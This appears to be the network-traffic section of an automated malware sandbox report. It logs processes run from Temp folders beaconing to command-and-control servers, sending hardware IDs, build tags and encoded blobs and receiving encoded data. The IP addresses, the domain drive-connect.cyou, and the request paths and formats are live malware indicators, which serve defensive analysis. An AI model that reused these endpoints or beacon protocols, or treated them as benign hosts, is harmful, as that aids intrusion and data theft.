                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.987339020 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.987390041 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.987400055 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.990658998 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.990752935 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.103193998 CET1236INData Raw: 5c 38 19 5a 68 7a db 08 84 9a 45 60 a3 89 0d 45 3a ea e7 30 47 55 21 5e ba 8f c0 35 b4 9f 54 6b a9 64 ee 2b c7 84 01 88 80 7e 98 41 90 91 01 3b 47 6a d2 2f 55 fd dc 26 8e 5a bc ac 4b 78 52 24 3e 6b f5 fb 82 5a b9 8c eb 87 2b ac 4b 78 52 96 3c 6f
                                                                                                                                                                                                                                            Data Ascii: \8ZhzE`E:0GU!^5Tkd+~A;Gj/U&ZKxR$>kZ+KxR<o~Z*\+v4-WJ=s@Zo4)I|lyF+S^}uvWQl<$Xy.eeju3l|~ .%`3Qf$F2\7GqJH!^]bgV@HLYPteH


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.65000334.107.221.82801892C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.382740021 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.473535061 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 17:03:35 GMT
                                                                                                                                                                                                                                            Age: 11182
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:07.500797033 CET6OUTData Raw: 00
                                                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.650004185.215.113.206802952C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.504596949 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.847779989 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:57 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.850558043 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                            Content-Length: 211
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 32 42 44 33 34 30 35 45 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="hwid"DC2BD3405E6F1350827015------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build"stok------IDBKKKKKFBGDGDHIDBGH--
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.295819044 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:58 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                            Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            18192.168.2.650008185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.228975058 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013514001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.581356049 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.65001634.107.221.82801892C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.237071991 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:59.323781967 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 02:26:01 GMT
                                                                                                                                                                                                                                            Age: 63838
                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:09.409014940 CET6OUTData Raw: 00
                                                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            20192.168.2.650026185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:00.399282932 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:01.735090971 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:01 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            21192.168.2.650035185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:03.373497009 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 160
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:04.720464945 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            22192.168.2.650044185.215.113.4380
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:06.499126911 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:07.847287893 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            23192.168.2.650052185.215.113.4380
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:09.488893986 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 160
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:10.867553949 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:10 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.649867172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:13 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-09 20:09:14 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=lit03sgenr1jj60fem9thdg17l; expires=Fri, 04-Apr-2025 13:55:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GF49oSs7uFAQ53l6iXYaD8r43mdtiss%2FTSRb4XJGa%2F9Jw2u%2FVVt%2Bn8E8%2FuoETrLDhLzeFf%2FpJ0PCZyJ5Dh2Xm2vADJIhZTWBjRuIKe8IOo4p5lelkYPBOkPqTGclTrbfyjU%2Fu1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1b50cec42b1-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1885&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1549071&cwnd=207&unsent_bytes=0&cid=b4ddb59ff1437ccd&ts=722&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-09 20:09:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.649873172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:15 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 46
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:15 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=7mtbpo2nlhc4spnre79ab6ds6g; expires=Fri, 04-Apr-2025 13:55:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5AZAqRfktbGXqG9oLmXJzwoaFK981rjuT2p0ja2RoJikyAsUFn4576UlzCW4LB9cbiYmhuUzKkpeGpVPl93iuqqa1q3ppWq%2B8yzdF9vt5fH5lWo7jLD4oIfzZ5Ty7CXbjwJMu0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1c17c9a0fab-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1652&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=948&delivery_rate=1724748&cwnd=188&unsent_bytes=0&cid=6bc85607455b0296&ts=748&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC358INData Raw: 34 39 31 63 0d 0a 72 39 47 49 53 4b 6d 69 4c 62 68 62 68 34 51 2b 52 6c 31 47 6c 54 59 42 66 72 69 76 7a 58 6b 45 67 30 49 62 6a 64 70 71 41 70 72 55 38 2f 35 71 6b 35 59 42 6d 69 6a 69 70 67 51 79 4c 7a 50 77 47 69 4d 66 33 49 33 33 48 32 58 76 4d 58 36 68 2b 42 78 76 75 4a 57 33 36 53 54 61 78 77 47 61 50 76 2b 6d 42 42 30 6d 5a 50 42 59 49 30 53 61 79 71 63 62 5a 65 38 67 65 75 61 31 47 6d 37 35 78 37 33 76 49 4d 7a 42 53 64 6b 33 36 75 46 62 49 7a 77 73 2b 31 39 73 46 74 57 4e 34 56 74 68 2b 57 41 68 72 35 63 50 64 76 76 69 73 50 73 6a 69 39 38 42 77 33 6e 69 36 68 78 38 66 79 66 77 56 47 30 59 33 4d 53 6c 45 57 7a 6e 49 58 2f 6e 71 67 4e 6b 38 73 65 7a 37 43 48 47 79 46 33 55 50 65 33 71 58 53 6b 38 5a 4c 6b 55 5a 41 53 61 6c 65 39 49 56 4f 49 78 61
                                                                                                                                                                                                                                            Data Ascii: 491cr9GISKmiLbhbh4Q+Rl1GlTYBfrivzXkEg0IbjdpqAprU8/5qk5YBmijipgQyLzPwGiMf3I33H2XvMX6h+BxvuJW36STaxwGaPv+mBB0mZPBYI0SayqcbZe8geua1Gm75x73vIMzBSdk36uFbIzws+19sFtWN4Vth+WAhr5cPdvvisPsji98Bw3ni6hx8fyfwVG0Y3MSlEWznIX/nqgNk8sez7CHGyF3UPe3qXSk8ZLkUZASale9IVOIxa
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 4d 65 37 74 57 54 59 30 4c 66 70 5a 59 78 48 51 77 71 77 62 59 65 73 71 64 75 57 38 42 57 33 2b 7a 62 4f 71 5a 49 76 48 56 35 70 68 70 63 56 5a 4e 44 67 6f 34 52 5a 5a 58 4d 57 44 74 6c 74 68 37 57 41 68 72 37 41 4e 59 2f 76 47 76 4f 6b 69 77 4e 4a 50 79 44 2f 6f 34 30 34 69 4f 69 72 39 56 33 45 57 31 4d 75 73 45 6d 33 6f 4a 58 37 72 2b 45 59 67 2f 39 58 7a 73 6d 72 71 7a 55 54 57 4d 2f 4c 6d 48 44 74 78 50 62 64 54 62 31 79 43 6a 61 73 61 59 75 41 6b 64 2b 47 38 42 47 62 32 77 4c 7a 73 49 4d 76 48 52 64 49 78 35 4f 74 58 4b 7a 38 68 2b 6c 42 6c 45 4e 76 49 37 31 55 6d 35 6a 67 35 74 2f 67 6d 5a 2f 76 66 38 64 38 70 78 63 35 49 7a 48 6e 36 71 45 56 6b 4f 43 69 33 44 43 4d 53 33 38 4b 39 47 6e 54 6b 4c 6d 76 6a 76 51 35 74 2b 38 4f 7a 37 79 33 47 7a 6b 6e
                                                                                                                                                                                                                                            Data Ascii: Me7tWTY0LfpZYxHQwqwbYesqduW8BW3+zbOqZIvHV5phpcVZNDgo4RZZXMWDtlth7WAhr7ANY/vGvOkiwNJPyD/o404iOir9V3EW1MusEm3oJX7r+EYg/9XzsmrqzUTWM/LmHDtxPbdTb1yCjasaYuAkd+G8BGb2wLzsIMvHRdIx5OtXKz8h+lBlENvI71Um5jg5t/gmZ/vf8d8pxc5IzHn6qEVkOCi3DCMS38K9GnTkLmvjvQ5t+8Oz7y3Gzkn
